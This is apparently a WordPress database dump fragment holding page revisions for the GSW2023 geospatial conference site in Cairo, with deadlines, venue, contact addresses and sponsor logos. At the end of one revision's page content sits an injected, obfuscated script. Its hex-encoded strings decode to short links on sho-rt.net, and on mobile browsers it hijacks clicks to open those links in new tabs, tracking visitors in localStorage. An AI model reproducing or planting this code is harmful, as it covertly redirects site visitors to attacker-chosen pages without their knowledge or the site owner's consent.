main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:29:24','2023-08-16 00:29:24','',3066,'https://gsw2023.com/?p=5257',0,'revision','',0),
(5258,1,'2023-08-16 00:29:47','2023-08-16 00:29:47','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" 